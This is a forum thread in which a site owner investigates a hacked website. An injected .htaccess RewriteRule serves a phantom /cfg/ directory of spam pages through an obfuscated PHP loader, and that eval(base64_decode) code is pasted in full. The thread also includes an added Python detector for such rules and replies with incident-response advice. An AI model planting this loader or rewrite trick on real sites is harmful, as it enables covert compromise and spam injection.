PHP
keslo, 2014-09-14 20:50:17

How to find a directory on the site that exists but is not visible?

Good afternoon, ladies and gentlemen!
The question in the title turned out to be rather chaotic. But... crlz seems to have been some kind of hack...
There is a website - www.macmachine.ru/ Everything works and opens there. About 20-30 pages.
Today I noticed that there are 5000+ pages in the Yandex index O_o
I started looking.
All new pages come from such a directory www.macmachine.ru/cfg/. But I don't have the /cfg/ directory on my hosting... and it shouldn't be. All links open some kind of slag with advertising.
What to do?
LATEST NEWS
1. Found these lines in .htaccess:

Options +FollowSymlinks
RewriteEngine   on
RewriteRule ^cfg/(.*)$ /manager/includes/config.php/$1 [L] 
RewriteBase /

2. config.php is like this:
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=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
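
Added example, not part of the original post: a Python check that answers the title question for this case by listing URL directories that exist only as a RewriteRule, and flagging the script behind them when it has the eval(base64_decode(...)) / __halt_compiler() shape of the config.php above. The names phantom_directories and demo and the temporary webroot are constructed for illustration; it assumes a substitution starting with / is relative to the document root.

```python
import re
import tempfile
from pathlib import Path

RULE = re.compile(r'^\s*RewriteRule\s+(\S+)\s+(\S+)', re.I | re.M)
# Loader shape of the posted config.php: eval() over base64-decoded data.
OBFUSCATED = re.compile(r'eval\s*\(\s*base64_decode\s*\(|__halt_compiler\s*\(', re.I)

def phantom_directories(webroot):
    """Find rewrite rules that serve a URL directory missing on disk."""
    root = Path(webroot)
    findings = []
    for ht in root.rglob('.htaccess'):
        for pattern, target in RULE.findall(ht.read_text(errors='replace')):
            m = re.match(r'\^?/?([\w.-]+)/', pattern)  # literal first segment
            if not m or (ht.parent / m.group(1)).is_dir():
                continue  # no fixed prefix, or the directory really exists
            # Drop PATH_INFO ("/$1") or a query string to get the script.
            script = re.sub(r'(\.php)[/?].*$', r'\1', target)
            # Assumption: a leading "/" means "relative to the document root".
            base = root if script.startswith('/') else ht.parent
            path = base / script.lstrip('/')
            body = path.read_text(errors='replace') if path.is_file() else ''
            prefix = (ht.parent.relative_to(root) / m.group(1)).as_posix()
            findings.append({
                'url_prefix': '/' + prefix + '/',
                'script': script,
                'script_exists': path.is_file(),
                'obfuscated': bool(OBFUSCATED.search(body)),
            })
    return findings

def demo():
    """Constructed webroot mirroring the rule quoted in the question."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / 'manager/includes').mkdir(parents=True)
        (root / 'img').mkdir()
        (root / '.htaccess').write_text(
            'RewriteEngine on\n'
            'RewriteRule ^cfg/(.*)$ /manager/includes/config.php/$1 [L]\n'
            'RewriteRule ^img/(.*)$ /static/$1 [L]\n')
        # Constructed stand-in for the loader; the base64 decodes to "echo 1;".
        (root / 'manager/includes/config.php').write_text(
            '<?php eval(base64_decode("ZWNobyAxOw=="));__halt_compiler();')
        return phantom_directories(root)

if __name__ == '__main__':
    print(demo())
```

Run against a copy of the real document root, every finding is a rule to remove and a script to inspect; the img rule in the sample is skipped because that directory exists on disk.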

3 answer(s)
Alexey Zakharov, 2014-09-14
@keslo

Are you sure that this folder is on YOUR server?
As I understand it, you have access to the site, and the site is relatively working (if all the pages of the site have suddenly changed, then look at the domain settings, maybe it was stolen).
Well, if there is access, then the problem is most likely in the scripts.
Physically, this folder may not exist.

Maksim Zverev, 2014-09-14
@m1skam

How you get hacked depends on a lot of factors.
1. Banal brute force, both admin panels and ftp / sftp.
If you have sftp, check with the last command; if ftp, look at the logs. If you are on shared hosting, ask the hosting company to give you the ftp logs.
2. We used a third-party PHP component without understanding it.
3. The freelancer did something, the access leaked through him / with the help of him.
UPD: This thing has a cool name, it knocks on its own home under the user agent: SEoDOR-Client

keslo, 2014-09-14
@keslo

Your expert opinion: how could such code get on the site? And what steps can be taken to minimize this?
